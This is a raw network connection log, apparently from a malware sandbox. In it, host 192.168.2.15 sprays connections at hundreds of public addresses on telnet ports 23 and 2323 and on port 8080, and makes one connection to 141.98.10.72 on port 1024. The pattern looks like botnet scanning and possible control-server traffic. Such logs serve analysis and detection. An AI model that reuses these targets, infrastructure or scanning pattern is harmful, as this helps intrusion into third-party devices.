Feb 14, 2024 09:28:44.374413967 CET	6752	8080	192.168.2.15	94.78.223.4
Feb 14, 2024 09:28:44.374413967 CET	6752	8080	192.168.2.15	95.3.50.36
Feb 14, 2024 09:28:44.374428034 CET	6752	8080	192.168.2.15	31.252.35.157
Feb 14, 2024 09:28:44.374430895 CET	6752	8080	192.168.2.15	94.232.39.17
Feb 14, 2024 09:28:44.374438047 CET	6752	8080	192.168.2.15	62.61.238.126
Feb 14, 2024 09:28:44.374440908 CET	6752	8080	192.168.2.15	85.199.152.34
Feb 14, 2024 09:28:44.374447107 CET	6752	8080	192.168.2.15	31.209.209.133
Feb 14, 2024 09:28:44.374452114 CET	6752	8080	192.168.2.15	62.102.135.191
Feb 14, 2024 09:28:44.374460936 CET	6752	8080	192.168.2.15	31.138.4.215
Feb 14, 2024 09:28:44.374464035 CET	6752	8080	192.168.2.15	31.45.252.222
Feb 14, 2024 09:28:44.374476910 CET	6752	8080	192.168.2.15	85.19.15.18
Feb 14, 2024 09:28:44.374496937 CET	6752	8080	192.168.2.15	31.126.140.55
Feb 14, 2024 09:28:44.374496937 CET	6752	8080	192.168.2.15	62.166.110.130
Feb 14, 2024 09:28:44.374497890 CET	6752	8080	192.168.2.15	31.152.233.220
Feb 14, 2024 09:28:44.374504089 CET	6752	8080	192.168.2.15	94.157.32.35
Feb 14, 2024 09:28:44.374504089 CET	6752	8080	192.168.2.15	31.164.31.139
Feb 14, 2024 09:28:44.374506950 CET	6752	8080	192.168.2.15	62.48.96.208
Feb 14, 2024 09:28:44.374506950 CET	6752	8080	192.168.2.15	95.194.176.22
Feb 14, 2024 09:28:44.374512911 CET	6752	8080	192.168.2.15	95.222.45.70
Feb 14, 2024 09:28:44.374530077 CET	6752	8080	192.168.2.15	85.228.220.151
Feb 14, 2024 09:28:44.374542952 CET	6752	8080	192.168.2.15	62.118.29.252
Feb 14, 2024 09:28:44.374545097 CET	6752	8080	192.168.2.15	94.13.148.135
Feb 14, 2024 09:28:44.374545097 CET	6752	8080	192.168.2.15	95.238.236.254
Feb 14, 2024 09:28:44.374545097 CET	6752	8080	192.168.2.15	95.33.187.222
Feb 14, 2024 09:28:44.374552965 CET	6752	8080	192.168.2.15	62.34.97.55
Feb 14, 2024 09:28:44.374556065 CET	6752	8080	192.168.2.15	95.40.176.122
Feb 14, 2024 09:28:44.374557018 CET	6752	8080	192.168.2.15	85.6.44.62
Feb 14, 2024 09:28:44.374557018 CET	6752	8080	192.168.2.15	95.255.169.178
Feb 14, 2024 09:28:44.374557018 CET	6752	8080	192.168.2.15	94.199.17.253
Feb 14, 2024 09:28:44.374557018 CET	6752	8080	192.168.2.15	95.254.108.59
Feb 14, 2024 09:28:44.374557018 CET	6752	8080	192.168.2.15	31.223.104.140
Feb 14, 2024 09:28:44.374557018 CET	6752	8080	192.168.2.15	94.175.18.28
Feb 14, 2024 09:28:44.374566078 CET	6752	8080	192.168.2.15	31.252.74.172
Feb 14, 2024 09:28:44.374576092 CET	6752	8080	192.168.2.15	31.219.215.123
Feb 14, 2024 09:28:44.374577999 CET	6752	8080	192.168.2.15	31.132.148.8
Feb 14, 2024 09:28:44.374577999 CET	6752	8080	192.168.2.15	62.154.2.165
Feb 14, 2024 09:28:44.374577999 CET	6752	8080	192.168.2.15	95.219.29.127
Feb 14, 2024 09:28:44.374583006 CET	6752	8080	192.168.2.15	94.62.28.152
Feb 14, 2024 09:28:44.374583006 CET	6752	8080	192.168.2.15	62.63.74.200
Feb 14, 2024 09:28:44.374586105 CET	6752	8080	192.168.2.15	31.183.85.210
Feb 14, 2024 09:28:44.374591112 CET	6752	8080	192.168.2.15	85.76.58.63
Feb 14, 2024 09:28:44.374596119 CET	6752	8080	192.168.2.15	94.146.59.19
Feb 14, 2024 09:28:44.374596119 CET	6752	8080	192.168.2.15	85.68.205.0
Feb 14, 2024 09:28:44.374596119 CET	6752	8080	192.168.2.15	31.226.46.159
Feb 14, 2024 09:28:44.374596119 CET	6752	8080	192.168.2.15	85.45.153.83
Feb 14, 2024 09:28:44.374597073 CET	6752	8080	192.168.2.15	85.200.143.125
Feb 14, 2024 09:28:44.374597073 CET	6752	8080	192.168.2.15	94.53.77.62
Feb 14, 2024 09:28:44.374598026 CET	6752	8080	192.168.2.15	94.91.159.36
Feb 14, 2024 09:28:44.374598026 CET	6752	8080	192.168.2.15	95.231.104.129
Feb 14, 2024 09:28:44.374598026 CET	6752	8080	192.168.2.15	85.65.91.228
Feb 14, 2024 09:28:44.374612093 CET	6752	8080	192.168.2.15	31.102.174.223
Feb 14, 2024 09:28:44.374612093 CET	6752	8080	192.168.2.15	85.212.15.112
Feb 14, 2024 09:28:44.374625921 CET	6752	8080	192.168.2.15	62.200.2.4
Feb 14, 2024 09:28:44.374635935 CET	6752	8080	192.168.2.15	62.161.126.29
Feb 14, 2024 09:28:44.374635935 CET	6752	8080	192.168.2.15	31.192.167.196
Feb 14, 2024 09:28:44.374635935 CET	6752	8080	192.168.2.15	31.43.80.189
Feb 14, 2024 09:28:44.374641895 CET	6752	8080	192.168.2.15	62.61.205.174
Feb 14, 2024 09:28:44.374654055 CET	6752	8080	192.168.2.15	31.184.4.255
Feb 14, 2024 09:28:44.374664068 CET	6752	8080	192.168.2.15	94.44.23.226
Feb 14, 2024 09:28:44.374664068 CET	6752	8080	192.168.2.15	31.63.207.15
Feb 14, 2024 09:28:44.374664068 CET	6752	8080	192.168.2.15	31.253.117.77
Feb 14, 2024 09:28:44.374680042 CET	6752	8080	192.168.2.15	85.41.168.67
Feb 14, 2024 09:28:44.374686003 CET	6752	8080	192.168.2.15	31.237.147.47
Feb 14, 2024 09:28:44.374691963 CET	6752	8080	192.168.2.15	85.252.21.176
Feb 14, 2024 09:28:44.374699116 CET	6752	8080	192.168.2.15	95.188.255.188
Feb 14, 2024 09:28:44.374707937 CET	6752	8080	192.168.2.15	94.142.52.7
Feb 14, 2024 09:28:44.374711990 CET	6752	8080	192.168.2.15	62.191.164.168
Feb 14, 2024 09:28:44.408895016 CET	38980	1024	192.168.2.15	141.98.10.72
Feb 14, 2024 09:28:44.419398069 CET	1184	2323	192.168.2.15	128.39.59.61
Feb 14, 2024 09:28:44.419579029 CET	1184	23	192.168.2.15	42.106.187.1
Feb 14, 2024 09:28:44.419581890 CET	1184	23	192.168.2.15	96.147.40.239
Feb 14, 2024 09:28:44.419590950 CET	1184	23	192.168.2.15	68.69.58.46
Feb 14, 2024 09:28:44.419604063 CET	1184	23	192.168.2.15	204.227.89.238
Feb 14, 2024 09:28:44.419612885 CET	1184	23	192.168.2.15	211.198.148.137
Feb 14, 2024 09:28:44.419625044 CET	1184	23	192.168.2.15	44.61.105.132
Feb 14, 2024 09:28:44.419626951 CET	1184	23	192.168.2.15	131.134.139.92
Feb 14, 2024 09:28:44.419644117 CET	1184	23	192.168.2.15	91.71.106.48
Feb 14, 2024 09:28:44.419647932 CET	1184	23	192.168.2.15	95.182.52.232
Feb 14, 2024 09:28:44.419647932 CET	1184	23	192.168.2.15	138.203.123.128
Feb 14, 2024 09:28:44.419663906 CET	1184	23	192.168.2.15	52.160.7.6
Feb 14, 2024 09:28:44.419663906 CET	1184	23	192.168.2.15	114.183.99.130
Feb 14, 2024 09:28:44.419663906 CET	1184	23	192.168.2.15	73.119.144.119
Feb 14, 2024 09:28:44.419663906 CET	1184	2323	192.168.2.15	163.236.126.55
Feb 14, 2024 09:28:44.419677019 CET	1184	23	192.168.2.15	112.149.46.169
Feb 14, 2024 09:28:44.419687033 CET	1184	23	192.168.2.15	158.231.164.93
Feb 14, 2024 09:28:44.419687986 CET	1184	23	192.168.2.15	198.97.26.161
Feb 14, 2024 09:28:44.419687986 CET	1184	23	192.168.2.15	46.109.233.31
Feb 14, 2024 09:28:44.419687986 CET	1184	23	192.168.2.15	85.239.193.80
Feb 14, 2024 09:28:44.419709921 CET	1184	23	192.168.2.15	187.215.4.126
Feb 14, 2024 09:28:44.419711113 CET	1184	23	192.168.2.15	83.245.221.40
Feb 14, 2024 09:28:44.419711113 CET	1184	23	192.168.2.15	198.188.118.170
Feb 14, 2024 09:28:44.419740915 CET	1184	23	192.168.2.15	23.128.160.197
Feb 14, 2024 09:28:44.419742107 CET	1184	23	192.168.2.15	153.210.119.170
Feb 14, 2024 09:28:44.419773102 CET	1184	23	192.168.2.15	178.34.248.151
Feb 14, 2024 09:28:44.419775963 CET	1184	2323	192.168.2.15	95.99.148.207
Feb 14, 2024 09:28:44.419775963 CET	1184	23	192.168.2.15	106.222.120.93
Feb 14, 2024 09:28:44.419795036 CET	1184	23	192.168.2.15	94.42.208.75
Feb 14, 2024 09:28:44.419796944 CET	1184	23	192.168.2.15	64.21.164.14
Feb 14, 2024 09:28:44.419796944 CET	1184	23	192.168.2.15	42.112.72.56
Feb 14, 2024 09:28:44.419797897 CET	1184	23	192.168.2.15	41.240.241.80
Feb 14, 2024 09:28:44.419797897 CET	1184	23	192.168.2.15	148.31.50.55
Feb 14, 2024 09:28:44.419805050 CET	1184	23	192.168.2.15	90.149.124.227
Feb 14, 2024 09:28:44.419806957 CET	1184	23	192.168.2.15	204.129.125.234
Feb 14, 2024 09:28:44.419805050 CET	1184	2323	192.168.2.15	81.252.207.101
Feb 14, 2024 09:28:44.419805050 CET	1184	23	192.168.2.15	41.5.157.6
Feb 14, 2024 09:28:44.419811964 CET	1184	23	192.168.2.15	120.175.167.118
Feb 14, 2024 09:28:44.419811964 CET	1184	23	192.168.2.15	117.120.112.200
Feb 14, 2024 09:28:44.419814110 CET	1184	23	192.168.2.15	152.27.118.86
Feb 14, 2024 09:28:44.419823885 CET	1184	23	192.168.2.15	8.238.14.80
Feb 14, 2024 09:28:44.419825077 CET	1184	23	192.168.2.15	49.212.253.213
Feb 14, 2024 09:28:44.419828892 CET	1184	23	192.168.2.15	213.236.247.218
Feb 14, 2024 09:28:44.419840097 CET	1184	2323	192.168.2.15	114.1.48.209
Feb 14, 2024 09:28:44.419845104 CET	1184	23	192.168.2.15	114.184.28.11
Feb 14, 2024 09:28:44.419848919 CET	1184	23	192.168.2.15	206.81.97.86
Feb 14, 2024 09:28:44.419858932 CET	1184	23	192.168.2.15	169.155.152.94
Feb 14, 2024 09:28:44.419859886 CET	1184	23	192.168.2.15	204.213.161.240
Feb 14, 2024 09:28:44.419859886 CET	1184	2323	192.168.2.15	90.237.210.98
Feb 14, 2024 09:28:44.419866085 CET	1184	23	192.168.2.15	112.91.212.119
Feb 14, 2024 09:28:44.419867039 CET	1184	23	192.168.2.15	59.186.8.7
Feb 14, 2024 09:28:44.419874907 CET	1184	23	192.168.2.15	207.169.119.66
Feb 14, 2024 09:28:44.419879913 CET	1184	23	192.168.2.15	40.97.45.246
Feb 14, 2024 09:28:44.419879913 CET	1184	23	192.168.2.15	39.16.26.234
Feb 14, 2024 09:28:44.419879913 CET	1184	23	192.168.2.15	157.253.168.198
Feb 14, 2024 09:28:44.419879913 CET	1184	23	192.168.2.15	77.60.84.241
Feb 14, 2024 09:28:44.419888020 CET	1184	23	192.168.2.15	182.77.181.190
Feb 14, 2024 09:28:44.419907093 CET	1184	23	192.168.2.15	206.218.115.136
Feb 14, 2024 09:28:44.419918060 CET	1184	2323	192.168.2.15	34.38.78.58
Feb 14, 2024 09:28:44.419923067 CET	1184	23	192.168.2.15	221.52.47.188
Feb 14, 2024 09:28:44.419934988 CET	1184	23	192.168.2.15	125.212.178.76
Feb 14, 2024 09:28:44.419944048 CET	1184	23	192.168.2.15	53.143.86.30
Feb 14, 2024 09:28:44.419944048 CET	1184	23	192.168.2.15	211.155.196.247
Feb 14, 2024 09:28:44.419945955 CET	1184	23	192.168.2.15	140.19.229.252
Feb 14, 2024 09:28:44.419956923 CET	1184	23	192.168.2.15	76.251.92.80
Feb 14, 2024 09:28:44.419962883 CET	1184	23	192.168.2.15	156.85.83.211
Feb 14, 2024 09:28:44.419966936 CET	1184	23	192.168.2.15	121.207.130.35
Feb 14, 2024 09:28:44.419970036 CET	1184	23	192.168.2.15	59.51.238.81
Feb 14, 2024 09:28:44.419975042 CET	1184	23	192.168.2.15	188.47.114.202
Feb 14, 2024 09:28:44.419994116 CET	1184	2323	192.168.2.15	161.214.235.14
Feb 14, 2024 09:28:44.419997931 CET	1184	23	192.168.2.15	59.116.116.245
Feb 14, 2024 09:28:44.420000076 CET	1184	23	192.168.2.15	44.112.236.111
Feb 14, 2024 09:28:44.420001030 CET	1184	23	192.168.2.15	188.141.19.146
Feb 14, 2024 09:28:44.420023918 CET	1184	23	192.168.2.15	115.110.93.10
Feb 14, 2024 09:28:44.420025110 CET	1184	23	192.168.2.15	43.192.191.105
Feb 14, 2024 09:28:44.420023918 CET	1184	23	192.168.2.15	67.230.253.255
Feb 14, 2024 09:28:44.420028925 CET	1184	23	192.168.2.15	105.115.42.159
Feb 14, 2024 09:28:44.420047045 CET	1184	23	192.168.2.15	167.129.2.233
Feb 14, 2024 09:28:44.420047045 CET	1184	23	192.168.2.15	117.96.54.0
Feb 14, 2024 09:28:44.420064926 CET	1184	23	192.168.2.15	197.193.116.2
Feb 14, 2024 09:28:44.420066118 CET	1184	23	192.168.2.15	150.111.143.234
Feb 14, 2024 09:28:44.420066118 CET	1184	2323	192.168.2.15	70.79.84.25
Feb 14, 2024 09:28:44.420068026 CET	1184	23	192.168.2.15	116.182.142.100
Feb 14, 2024 09:28:44.420083046 CET	1184	23	192.168.2.15	112.180.173.50
Feb 14, 2024 09:28:44.420094013 CET	1184	23	192.168.2.15	57.145.166.209
Feb 14, 2024 09:28:44.420103073 CET	1184	23	192.168.2.15	197.107.117.136
Feb 14, 2024 09:28:44.420108080 CET	1184	23	192.168.2.15	108.212.109.62
Feb 14, 2024 09:28:44.420119047 CET	1184	23	192.168.2.15	27.103.224.53
Feb 14, 2024 09:28:44.420125961 CET	1184	23	192.168.2.15	131.187.212.227
Feb 14, 2024 09:28:44.420150995 CET	1184	2323	192.168.2.15	71.90.182.32
Feb 14, 2024 09:28:44.420161009 CET	1184	23	192.168.2.15	140.123.149.101
Feb 14, 2024 09:28:44.420161009 CET	1184	23	192.168.2.15	86.108.163.254
Feb 14, 2024 09:28:44.420167923 CET	1184	23	192.168.2.15	45.124.54.254
Feb 14, 2024 09:28:44.420186043 CET	1184	23	192.168.2.15	170.50.33.247
Feb 14, 2024 09:28:44.420188904 CET	1184	23	192.168.2.15	40.86.134.171
Feb 14, 2024 09:28:44.420188904 CET	1184	23	192.168.2.15	199.196.153.110
Feb 14, 2024 09:28:44.420190096 CET	1184	23	192.168.2.15	120.174.103.245
Feb 14, 2024 09:28:44.420202017 CET	1184	23	192.168.2.15	73.76.128.181
Feb 14, 2024 09:28:44.420202971 CET	1184	23	192.168.2.15	134.136.33.239
Feb 14, 2024 09:28:44.420209885 CET	1184	23	192.168.2.15	46.53.50.112
Feb 14, 2024 09:28:44.420214891 CET	1184	2323	192.168.2.15	39.119.123.196
Feb 14, 2024 09:28:44.420214891 CET	1184	23	192.168.2.15	149.50.4.10
Feb 14, 2024 09:28:44.420216084 CET	1184	23	192.168.2.15	84.137.62.104
Feb 14, 2024 09:28:44.420217037 CET	1184	23	192.168.2.15	176.89.238.131
Feb 14, 2024 09:28:44.420222044 CET	1184	23	192.168.2.15	2.195.205.136
Feb 14, 2024 09:28:44.420222044 CET	1184	23	192.168.2.15	203.56.196.191
Feb 14, 2024 09:28:44.420227051 CET	1184	23	192.168.2.15	216.92.3.165
Feb 14, 2024 09:28:44.420227051 CET	1184	23	192.168.2.15	47.175.41.86
Feb 14, 2024 09:28:44.420228958 CET	1184	23	192.168.2.15	123.222.188.43
Feb 14, 2024 09:28:44.420231104 CET	1184	23	192.168.2.15	68.203.214.234
Feb 14, 2024 09:28:44.420237064 CET	1184	2323	192.168.2.15	143.129.5.12
Feb 14, 2024 09:28:44.420248032 CET	1184	23	192.168.2.15	69.252.28.211
Feb 14, 2024 09:28:44.420252085 CET	1184	23	192.168.2.15	124.60.136.88
Feb 14, 2024 09:28:44.420255899 CET	1184	23	192.168.2.15	32.156.113.147
Feb 14, 2024 09:28:44.420260906 CET	1184	23	192.168.2.15	116.175.204.252
Feb 14, 2024 09:28:44.420274019 CET	1184	23	192.168.2.15	70.151.144.153
Feb 14, 2024 09:28:44.420274973 CET	1184	23	192.168.2.15	47.171.10.111
Feb 14, 2024 09:28:44.420274973 CET	1184	23	192.168.2.15	62.72.65.62
Feb 14, 2024 09:28:44.420289993 CET	1184	23	192.168.2.15	27.185.217.164
Feb 14, 2024 09:28:44.420299053 CET	1184	2323	192.168.2.15	136.21.148.125
Feb 14, 2024 09:28:44.420311928 CET	1184	23	192.168.2.15	99.223.143.70
Feb 14, 2024 09:28:44.420320034 CET	1184	23	192.168.2.15	108.130.186.251
Feb 14, 2024 09:28:44.420331955 CET	1184	23	192.168.2.15	158.37.18.11
Feb 14, 2024 09:28:44.420331955 CET	1184	23	192.168.2.15	58.116.202.236
Feb 14, 2024 09:28:44.420331955 CET	1184	23	192.168.2.15	158.140.47.59
Feb 14, 2024 09:28:44.420339108 CET	1184	23	192.168.2.15	89.157.13.167
Feb 14, 2024 09:28:44.420344114 CET	1184	23	192.168.2.15	66.137.28.14
Feb 14, 2024 09:28:44.420344114 CET	1184	23	192.168.2.15	13.242.192.159
Feb 14, 2024 09:28:44.420365095 CET	1184	23	192.168.2.15	106.42.146.143
Feb 14, 2024 09:28:44.420365095 CET	1184	23	192.168.2.15	94.111.248.67
Feb 14, 2024 09:28:44.420375109 CET	1184	2323	192.168.2.15	196.52.10.197
Feb 14, 2024 09:28:44.420382023 CET	1184	23	192.168.2.15	19.221.86.96
Feb 14, 2024 09:28:44.420382977 CET	1184	23	192.168.2.15	145.125.207.50
Feb 14, 2024 09:28:44.420391083 CET	1184	23	192.168.2.15	80.92.69.248
Feb 14, 2024 09:28:44.420393944 CET	1184	23	192.168.2.15	99.177.91.240
Feb 14, 2024 09:28:44.420399904 CET	1184	23	192.168.2.15	41.240.249.18
Feb 14, 2024 09:28:44.420412064 CET	1184	23	192.168.2.15	128.64.9.107
Feb 14, 2024 09:28:44.420418024 CET	1184	23	192.168.2.15	13.29.188.144
Feb 14, 2024 09:28:44.420433044 CET	1184	23	192.168.2.15	79.134.149.163
Feb 14, 2024 09:28:44.420433044 CET	1184	23	192.168.2.15	112.106.227.214
Feb 14, 2024 09:28:44.420434952 CET	1184	2323	192.168.2.15	77.84.150.4
Feb 14, 2024 09:28:44.420443058 CET	1184	23	192.168.2.15	102.12.111.186
Feb 14, 2024 09:28:44.420459986 CET	1184	23	192.168.2.15	12.122.162.48
Feb 14, 2024 09:28:44.420461893 CET	1184	23	192.168.2.15	109.34.158.247
Feb 14, 2024 09:28:44.420470953 CET	1184	23	192.168.2.15	147.70.200.244
Feb 14, 2024 09:28:44.420470953 CET	1184	23	192.168.2.15	128.128.22.23
Feb 14, 2024 09:28:44.420480013 CET	1184	23	192.168.2.15	18.99.224.252
Feb 14, 2024 09:28:44.420480013 CET	1184	23	192.168.2.15	92.111.222.84
Feb 14, 2024 09:28:44.420480013 CET	1184	23	192.168.2.15	117.194.143.123
Feb 14, 2024 09:28:44.420483112 CET	1184	23	192.168.2.15	79.204.140.144
Feb 14, 2024 09:28:44.420485020 CET	1184	2323	192.168.2.15	155.23.247.147
Feb 14, 2024 09:28:44.420495987 CET	1184	23	192.168.2.15	32.72.236.84
Feb 14, 2024 09:28:44.420497894 CET	1184	23	192.168.2.15	158.118.59.234
Feb 14, 2024 09:28:44.420510054 CET	1184	23	192.168.2.15	94.101.137.32
Feb 14, 2024 09:28:44.420520067 CET	1184	23	192.168.2.15	202.128.106.230
Feb 14, 2024 09:28:44.420521021 CET	1184	23	192.168.2.15	135.129.37.15
Feb 14, 2024 09:28:44.420521021 CET	1184	23	192.168.2.15	141.244.15.225
Feb 14, 2024 09:28:44.420521975 CET	1184	23	192.168.2.15	23.2.99.39
Feb 14, 2024 09:28:44.420520067 CET	1184	23	192.168.2.15	183.61.186.13
Feb 14, 2024 09:28:44.420561075 CET	1184	23	192.168.2.15	100.226.172.250
Feb 14, 2024 09:28:44.420562029 CET	1184	23	192.168.2.15	2.43.126.141
Feb 14, 2024 09:28:44.420576096 CET	1184	23	192.168.2.15	89.201.227.126
Feb 14, 2024 09:28:44.420581102 CET	1184	2323	192.168.2.15	40.71.87.36
Feb 14, 2024 09:28:44.420581102 CET	1184	23	192.168.2.15	221.90.1.194
Feb 14, 2024 09:28:44.420594931 CET	1184	23	192.168.2.15	68.159.28.110
Feb 14, 2024 09:28:44.420594931 CET	1184	23	192.168.2.15	181.37.232.35
Feb 14, 2024 09:28:44.420595884 CET	1184	23	192.168.2.15	174.116.178.61
Feb 14, 2024 09:28:44.420595884 CET	1184	23	192.168.2.15	109.92.26.16
Feb 14, 2024 09:28:44.420612097 CET	1184	23	192.168.2.15	191.251.57.203
Feb 14, 2024 09:28:44.420614958 CET	1184	23	192.168.2.15	48.80.246.173
Feb 14, 2024 09:28:44.420625925 CET	1184	23	192.168.2.15	169.239.195.233
Feb 14, 2024 09:28:44.420628071 CET	1184	2323	192.168.2.15	89.15.178.177
Feb 14, 2024 09:28:44.420635939 CET	1184	23	192.168.2.15	174.194.168.234
Feb 14, 2024 09:28:44.420644999 CET	1184	23	192.168.2.15	90.134.117.117
Feb 14, 2024 09:28:44.420651913 CET	1184	23	192.168.2.15	20.55.138.182
Feb 14, 2024 09:28:44.420670986 CET	1184	23	192.168.2.15	206.173.96.103
Feb 14, 2024 09:28:44.420674086 CET	1184	23	192.168.2.15	176.58.88.174
Feb 14, 2024 09:28:44.420674086 CET	1184	23	192.168.2.15	84.101.77.10
Feb 14, 2024 09:28:44.420689106 CET	1184	23	192.168.2.15	206.242.24.196
Feb 14, 2024 09:28:44.420691013 CET	1184	2323	192.168.2.15	1.248.131.225
Feb 14, 2024 09:28:44.420703888 CET	1184	23	192.168.2.15	156.44.121.9
Feb 14, 2024 09:28:44.420706987 CET	1184	23	192.168.2.15	64.88.78.183
Feb 14, 2024 09:28:44.420717001 CET	1184	23	192.168.2.15	165.53.192.220
Feb 14, 2024 09:28:44.420725107 CET	1184	23	192.168.2.15	110.134.184.207
Feb 14, 2024 09:28:44.420737028 CET	1184	23	192.168.2.15	51.143.181.106
Feb 14, 2024 09:28:44.420738935 CET	1184	23	192.168.2.15	176.83.226.52
Feb 14, 2024 09:28:44.420739889 CET	1184	23	192.168.2.15	78.198.231.60
Feb 14, 2024 09:28:44.420759916 CET	1184	2323	192.168.2.15	88.49.146.70
Feb 14, 2024 09:28:44.420774937 CET	1184	23	192.168.2.15	57.53.19.30
Feb 14, 2024 09:28:44.420787096 CET	1184	23	192.168.2.15	155.174.143.164
Feb 14, 2024 09:28:44.420793056 CET	1184	23	192.168.2.15	62.252.42.5
Feb 14, 2024 09:28:44.420805931 CET	1184	23	192.168.2.15	145.227.14.193
Feb 14, 2024 09:28:44.420810938 CET	1184	23	192.168.2.15	114.150.146.14
Feb 14, 2024 09:28:44.420810938 CET	1184	23	192.168.2.15	67.11.91.71
Feb 14, 2024 09:28:44.420825005 CET	1184	23	192.168.2.15	141.153.221.225
Feb 14, 2024 09:28:44.420825005 CET	1184	23	192.168.2.15	96.6.43.214
Feb 14, 2024 09:28:44.420825005 CET	1184	23	192.168.2.15	89.45.179.173
Feb 14, 2024 09:28:44.420825005 CET	1184	23	192.168.2.15	105.65.229.87
Feb 14, 2024 09:28:44.420825958 CET	1184	23	192.168.2.15	34.97.144.40
Feb 14, 2024 09:28:44.420829058 CET	1184	2323	192.168.2.15	64.158.237.38
Feb 14, 2024 09:28:44.420833111 CET	1184	23	192.168.2.15	85.79.7.175
Feb 14, 2024 09:28:44.420845985 CET	1184	23	192.168.2.15	138.45.171.145
Feb 14, 2024 09:28:44.420849085 CET	1184	23	192.168.2.15	51.242.124.114
Feb 14, 2024 09:28:44.420849085 CET	1184	23	192.168.2.15	205.229.26.148
Feb 14, 2024 09:28:44.420861006 CET	1184	23	192.168.2.15	133.177.17.69
Feb 14, 2024 09:28:44.420869112 CET	1184	23	192.168.2.15	96.81.37.67
Feb 14, 2024 09:28:44.420872927 CET	1184	23	192.168.2.15	80.135.182.105
Feb 14, 2024 09:28:44.420878887 CET	1184	23	192.168.2.15	136.224.83.174
Feb 14, 2024 09:28:44.420892954 CET	1184	2323	192.168.2.15	132.132.234.89
Feb 14, 2024 09:28:44.420907974 CET	1184	23	192.168.2.15	87.46.88.219
Feb 14, 2024 09:28:44.420922041 CET	1184	23	192.168.2.15	107.134.44.202
Feb 14, 2024 09:28:44.420922041 CET	1184	23	192.168.2.15	159.73.51.221
Feb 14, 2024 09:28:44.420922041 CET	1184	23	192.168.2.15	163.21.181.75
Feb 14, 2024 09:28:44.420922041 CET	1184	23	192.168.2.15	90.39.205.140
Feb 14, 2024 09:28:44.420921087 CET	1184	23	192.168.2.15	145.162.161.47
Feb 14, 2024 09:28:44.420922041 CET	1184	23	192.168.2.15	45.101.243.121
Feb 14, 2024 09:28:44.420928955 CET	1184	23	192.168.2.15	112.100.72.196
Feb 14, 2024 09:28:44.420933008 CET	1184	23	192.168.2.15	221.211.154.175
Feb 14, 2024 09:28:44.420933008 CET	1184	23	192.168.2.15	135.118.234.93
Feb 14, 2024 09:28:44.420936108 CET	1184	2323	192.168.2.15	39.108.213.224
Feb 14, 2024 09:28:44.420947075 CET	1184	23	192.168.2.15	217.64.185.55
Feb 14, 2024 09:28:44.420948982 CET	1184	23	192.168.2.15	115.223.26.240
Feb 14, 2024 09:28:44.420948982 CET	1184	23	192.168.2.15	189.158.146.152
Feb 14, 2024 09:28:44.420949936 CET	1184	23	192.168.2.15	117.170.237.4
Feb 14, 2024 09:28:44.420949936 CET	1184	23	192.168.2.15	123.23.92.235
Feb 14, 2024 09:28:44.420950890 CET	1184	23	192.168.2.15	128.32.111.63
Feb 14, 2024 09:28:44.420950890 CET	1184	23	192.168.2.15	13.25.110.131
Feb 14, 2024 09:28:44.420950890 CET	1184	23	192.168.2.15	218.110.189.212
Feb 14, 2024 09:28:44.420960903 CET	1184	23	192.168.2.15	128.97.15.220
Feb 14, 2024 09:28:44.420963049 CET	1184	2323	192.168.2.15	65.172.93.62
Feb 14, 2024 09:28:44.420977116 CET	1184	23	192.168.2.15	38.17.139.186
Feb 14, 2024 09:28:44.420979977 CET	1184	23	192.168.2.15	134.23.41.70
Feb 14, 2024 09:28:44.420984030 CET	1184	23	192.168.2.15	57.164.125.208
Feb 14, 2024 09:28:44.420985937 CET	1184	23	192.168.2.15	151.164.20.3
Feb 14, 2024 09:28:44.420999050 CET	1184	23	192.168.2.15	168.114.255.241
Feb 14, 2024 09:28:44.421006918 CET	1184	23	192.168.2.15	72.4.87.105
Feb 14, 2024 09:28:44.421015024 CET	1184	23	192.168.2.15	47.249.28.203
Feb 14, 2024 09:28:44.421030998 CET	1184	23	192.168.2.15	194.167.190.74
Feb 14, 2024 09:28:44.421030998 CET	1184	23	192.168.2.15	74.145.211.195
Feb 14, 2024 09:28:44.421036005 CET	1184	23	192.168.2.15	67.221.101.133
Feb 14, 2024 09:28:44.421039104 CET	1184	2323	192.168.2.15	219.213.171.117
Feb 14, 2024 09:28:44.421042919 CET	1184	23	192.168.2.15	73.128.184.147
Feb 14, 2024 09:28:44.421055079 CET	1184	23	192.168.2.15	46.189.26.42
Feb 14, 2024 09:28:44.421055079 CET	1184	23	192.168.2.15	31.159.121.22
Feb 14, 2024 09:28:44.421056986 CET	1184	23	192.168.2.15	25.205.23.38
Feb 14, 2024 09:28:44.421066999 CET	1184	23	192.168.2.15	90.51.99.17
Feb 14, 2024 09:28:44.421073914 CET	1184	23	192.168.2.15	80.0.110.143
Feb 14, 2024 09:28:44.421102047 CET	1184	23	192.168.2.15	173.241.206.133
Feb 14, 2024 09:28:44.421103954 CET	1184	23	192.168.2.15	36.93.229.211
Feb 14, 2024 09:28:44.421103954 CET	1184	23	192.168.2.15	186.252.217.192
Feb 14, 2024 09:28:44.421106100 CET	1184	2323	192.168.2.15	203.100.17.186
Feb 14, 2024 09:28:44.421120882 CET	1184	23	192.168.2.15	136.186.18.156
Feb 14, 2024 09:28:44.421122074 CET	1184	23	192.168.2.15	143.122.138.151
Feb 14, 2024 09:28:44.421123981 CET	1184	23	192.168.2.15	85.160.120.99
Feb 14, 2024 09:28:44.421124935 CET	1184	23	192.168.2.15	166.151.43.62
Feb 14, 2024 09:28:44.421127081 CET	1184	23	192.168.2.15	217.195.146.230
Feb 14, 2024 09:28:44.421128988 CET	1184	23	192.168.2.15	211.85.21.26
Feb 14, 2024 09:28:44.421128988 CET	1184	23	192.168.2.15	170.127.166.106
Feb 14, 2024 09:28:44.421147108 CET	1184	23	192.168.2.15	24.163.97.169
Feb 14, 2024 09:28:44.421164036 CET	1184	2323	192.168.2.15	72.104.100.214
Feb 14, 2024 09:28:44.421169043 CET	1184	23	192.168.2.15	69.196.15.37
Feb 14, 2024 09:28:44.421169996 CET	1184	23	192.168.2.15	144.105.155.214
Feb 14, 2024 09:28:44.421184063 CET	1184	23	192.168.2.15	61.229.115.187
Feb 14, 2024 09:28:44.421188116 CET	1184	23	192.168.2.15	110.112.250.108
Feb 14, 2024 09:28:44.421201944 CET	1184	23	192.168.2.15	203.189.54.43
Feb 14, 2024 09:28:44.421216965 CET	1184	23	192.168.2.15	94.203.124.251
Feb 14, 2024 09:28:44.421216965 CET	1184	23	192.168.2.15	148.66.142.95
Feb 14, 2024 09:28:44.421233892 CET	1184	23	192.168.2.15	66.91.189.73
Feb 14, 2024 09:28:44.421248913 CET	1184	23	192.168.2.15	9.110.136.75
Feb 14, 2024 09:28:44.421263933 CET	1184	23	192.168.2.15	97.39.241.14
